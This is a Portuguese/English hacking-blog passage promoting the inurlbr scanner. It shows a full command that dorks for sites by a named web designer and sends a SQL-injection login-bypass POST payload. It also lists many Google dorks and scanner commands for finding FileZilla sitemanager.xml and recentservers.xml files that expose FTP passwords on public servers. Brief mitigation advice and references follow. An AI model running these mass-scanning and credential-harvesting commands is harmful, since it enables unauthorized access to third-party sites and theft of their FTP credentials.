R: O comando exploit-get do script inurlbr é tratado mais como um concatenador de string adicionado no final de cada alvo depois executado, por esse motivo é possível usar ele sem altera o Request total.

- Setar request Bypass POST
Exemplo:
 --exploit-post Defines which exploit will be injected through the POST method to each URL found.
     Example: --exploit-post {exploit_post}
     Usage:   --exploit-post 'field1=valor1&field2=valor2&field3=?´0x273exploit;&botao=ok'

Usando para exploração atual:
--exploit-post "email='=' 'OR'&password='=' 'OR'&from_page=http://www.theultimaterose.com/&Submit_Login=Login to My Account"

Comando completo:
php inurlbr.php --dork 'intext:"by Shaffer Web Design" ext:php' -s tutorial.txt --ifredirect 'my_account.php' --exploit-get '/login.php' --exploit-post "email='=' 'OR'&password='=' 'OR'&from_page=http://www.xx.com/&Submit_Login=Login to My Account"

Exemplo de Saída vulnerável:
Comando completo: php inurlbr.php --dork 'intext:"by Shaffer Web Design" ext:php' -s tutorial.txt --ifredirect 'my_account.php' --exploit-get '/login.php' --exploit-post "email='=' 'OR'&password='=' 'OR'&from_page=http://www.xx.com/&Submit_Login=Login to My Account"  Exemplo de Saída vulnerável:
OBS: Exemplo do print usei comando -o para abrir um arquivo com alvo.

Solução ?

  1. Sempre filtre o que vem do cliente.
  2. Não confie em dados que vem do cliente.
  3. Filtre todo request seja get ou post $_REQUEST.
  4. Use PDO sem moderação Prepared Statements é o poder.
  5. Use filtros nativos do PHP filter_var

Referencia para soluções e estudos:
http://php.net/manual/pt_BR/security.database.sql-injection.php
https://www.owasp.org/index.php/Testing_for_SQL_Injection_(OTG-INPVAL-005)
http://php.net/manual/en/pdo.prepared-statements.php
http://us3.php.net/manual/en/filter.filters.validate.php
https://www.owasp.org/images/5/57/OWASP-AppSecEU08-Janot.pdf

domingo, 2 de agosto de 2015

Accessing sensitive data FileZilla

FileZilla FTP Passwords now Stored in Plaintext.

It's an old vulnerability FileZilla, but we can still find servers with such a security breach, Vulnerability allows access to sensitive files from the server. Containing passwords and FTP users.  FileZilla version ~ 3.0.9.2+ (and possibly older) store all FTP connection data .xml files in plain text.  The following files are what you need to know about:  filezilla.xml – Stores most recent server info including password in plaintext. recentservers.xml – Stores all recent server info including password in plaintext. sitemanager.xml – Stores all saved sites server info including password in plaintext.  These files can usually be found in the following directories: Windows XP/2K: "C:\Documents and Settings\username\Application Data\FileZilla" Windows Vista: "C:\Users\username\AppData\Roaming\FileZilla\" Linux: "/home/username/.filezilla/"  FileZilla configuration files FileZilla is a cross-platform application. That’s why it stores its settings in platform-neutral XML files.

It's an old vulnerability FileZilla, but we can still find servers with such a security breach, Vulnerability allows access to sensitive files from the server. Containing passwords and FTP users.

FileZilla version ~ 3.0.9.2+ (and possibly older) store all FTP connection data .xml files in plain text.

The following files are what you need to know about:

filezilla.xmlStores most recent server info including password in plaintext.
recentservers.xmlStores all recent server info including password in plaintext.
sitemanager.xmlStores all saved sites server info including password in plaintext.

These files can usually be found in the following directories:
Windows XP/2K: "C:\Documents and Settings\username\Application Data\FileZilla"
Windows Vista: "C:\Users\username\AppData\Roaming\FileZilla\"
Linux: "/home/username/.filezilla/"

FileZilla configuration files
FileZilla is a cross-platform application. That’s why it stores its settings in platform-neutral XML files.
FileZilla configuration files FileZilla is a cross-platform application. That’s why it stores its settings in platform-neutral XML files.

sitemanager.xml 
The XML files are readable for reading with access data, As you can see, everything is stored in plain text, including the password.
sitemanager.xml  The XML files are readable for reading with access data, As you can see, everything is stored in plain text, including the password.
filezilla.xml
The filezilla.xml file follow the same example sitemanager.xml, It starts with naming <LastServer>
filezilla.xml The filezilla.xml file follow the same example sitemanager.xml, It starts with naming <LastServer>
Quick connect 
QuickConnect lets you connect to servers without adding them to your administrative panel. when instaciado a fast connection it is added in recentservers.xml file.

Danger?
Yes the same way that you can read these files. Malicious applications can do the same, and can be read also on web servers.
ex:
www.target.com.br/folder/{file.xml}
www.target.com.br/microsite/geo243/FileZilla.xml www.target.com.br/149224/prg/programok/Total%20Commander/FileZilla/recentservers.xml

Other files:
  1. sitemanager.xml
  2. recentservers.xml
  3. filezilla.xml
  4. bookmarks.xml
  5. filters.xml
  6. layout.xml
  7. queue.xml
Looking for vulnerable servers
Now let's use the inurlbr tool to search sites with such breach and confirm such information.
Download tool: 
https://github.com/googleinurl/SCANNER-INURLBR

Setting command:
using search engines..

SET DORK:
Choose your dork search

  • "\FileZilla\" ext:xml
  • inurl:"\FileZilla\" & inurl:sitemanager.xml -github -sourceforge
  • inurl:"\FileZilla\" & inurl:recentservers.xml -github -sourceforge
  • inurl:"\FileZilla\" & inurl:filezilla.xml -github -sourceforge
  • inurl:"\FileZilla\" & inurl:bookmarks.xml -github -sourceforge
  • inurl:"\FileZilla\" & inurl:filters.xml -github -sourceforge
  • inurl:"\FileZilla\" & inurl:layout.xml -github -sourceforge
  • inurl:"\FileZilla\" & inurl:queue.xml -github -sourceforge
  • inurl:sitemanager.xml & ext:xml & -github -sourceforge
  • inurl:recentservers.xml & ext:xml & -github -sourceforge
  • inurl:filezilla.xml & ext:xml & -github -sourceforge
  • inurl:bookmarks.xml & ext:xml & -github -sourceforge
  • inurl:filters.xml & ext:xml & -github -sourceforge
  • inurl:layout.xml & ext:xml & -github -sourceforge
  • inurl:queue.xml & ext:xml & -github -sourceforge
  • inurl:"\FileZilla\" & inurl:(sitemanager.xml | recentservers.xml | filezilla.xml | filters.xml | bookmarks.xml | layout.xml | queue.xml) ext:xml -github -sourceforge
--dork 'YOU_DORK'
- Setting: --dork '"\FileZilla\" ext:xml'

SET FILE OUTPUT:
- Setting: -s filezilla.txt

SET TIPE VALIDATION: 
- Setting: -t
   2 The second type tries to valid the error defined by: -a 'VALUE_INSIDE_THE _TARGET' It    also establishes connection with the exploit through the get method.

SET STRING VALIDATION:
Specify the string that will be used on the search script:
   Example: -a {string}
   Usage:    -a '<title>hello world</title>'
   If specific value is found in the target he is considered vulnerable.
Setting:     -a '<FileZilla3>'
All filezilla file there is a primary tag called <FileZilla3>. It is trough this that we will validate.
Ex:
All filezilla file there is a primary tag called <FileZilla3>. It is trough this that we will validate. Ex:


Full command - using search engines:
php inurlbr.php --dork '"\FileZilla\" ext:xml' -s filezilla.txt -t 2 -a '<FileZilla3>'

OR SCANNER DORKING-FILE:
php inurlbr.php --dork-file dorks.txt -s filezilla.txt -t 2 -a '<FileZilla3>'

OUTPUT PRINT:
Full command - using search engines: php inurlbr.php --dork '"\FileZilla\" ext:xml' -s filezilla.txt -t 2 -a '<FileZilla3>'  OUTPUT PRINT:




Using FileZilla the safe way

FileZilla is a great FTP client and I use it myself. But since it doesn’t protect your FTP credentials, you should protect them yourselves. Here is what you can do:

1. Don’t use the “Normal” logon type. There are the “Ask for password” and the “Interactive” types that won’t save your passwords on disk. So malware simply won’t be able to get enough information from FileZilla configuration files to hack your sites.

Pros
Malware cannot steal your FTP credential from configuration files.

Cons
You’ll have to enter your password every time you connect to your site.
It won’t save you from more sophisticated spyware such as keyloggers and traffic sniffers. But I hope this sort of trojans can be better detected by you antivirus tools since they need to hook known system functions. To protect yourself from traffic sniffers, always use SFTP instead of FTP (if possible).

2. Hosts trick. If you manage multiple web sites, interactive logon types may be really inconvenient. There is a trick that can let you use the “Normal” logon type in a more secure manner. You should create aliases of your sites’ addresses in the “hosts” file (on Windows, you can find it in C:\WINDOWS\system32\drivers\etc\).

For example you have a site “example.com” with an IP-address "208.xxx.188.166".
To create an alias you need to add the following line into the hosts file:

208.xxx.188.166         my_example

"my_example" will work the same way as “example.com” when you use it on your computer.
However, on other computers it won’t make any sense. Now use this alias in FTP connection settings instead of “example.com”.
If hackers manage to steal your FTP credentials, all they’ll have will be: (host: my_example, user: unmask, password: parasites) – the username/password pair is valid, but the host name doesn’t make any sense to them. It’s like having a key and not knowing where the door is.

Pros
Once you have added new aliases to the hosts file and to FileZilla Site Manager, you can enjoy the ease of one-click connections.
Cons

This trick will only work as long as malware steals FTP credentials from configuration files verbatim (and I have proofs that at least some malware steal the data verbatim).  If they only add a simple check that converts host names to IP-addresses before sending the credentials to their central database, the trick will be useless.  This trick is better than no protection at all, but you should not count on it.
You’ll need to update the hosts file if IP-addresses change.

3. Public Key Authentication. If your hosting plan included SSH (secure shell), you can use FileZilla in SFTP mode. One of convenient SSH features is public key authentication. And FileZilla supports this type of authorization (I didn’t use it myself, but at least have seen the UI in the “Settings” dialog). FileZilla recognizes PuTTY’s Pageant, so the configuration should be easy if you already use PuTTY for SSH.

Pros
Secure one-click connections.

Cons

This authentication method will only work if your hosting plan includes SSH/SFTP. Unfortunately, this option is rearly included into shared hosting plans.
Creating the keys and configuring FileZilla to use them is not a trivial process.
You might still have to enter a pass phrase when adding keys to the Pageant.
Other FTP programs

In this article I reviewed FileZilla only because it’s a popular FTP client that I have on my computer and it was very easy to demonstrate how little it does to protect users’ FTP credentials. However the same concerns apply to all other  programs that have FTP functions: classical FTP clients, web page editors, file managers. Popular applications like DreamWeaver, CuteFTP, Total Commander, etc. account for majority of FTP credentials leaks.

Solution Source: http://blog.unmaskparasites.com/2009/09/01/beware-filezilla-doesnt-protect-your-ftp-passwords/

Referencias:
http://seclists.org/fulldisclosure/2008/Apr/508
http://blog.unmaskparasites.com/2009/09/01/beware-filezilla-doesnt-protect-your-ftp-passwords/
http://bl0wj0bb3r.blogspot.com.br/2015/08/d3lphi-filezilla-password-stealer.html
http://unsharptech.com/2008/05/20/filezilla-ftp-passwords-stored-in-plaintext/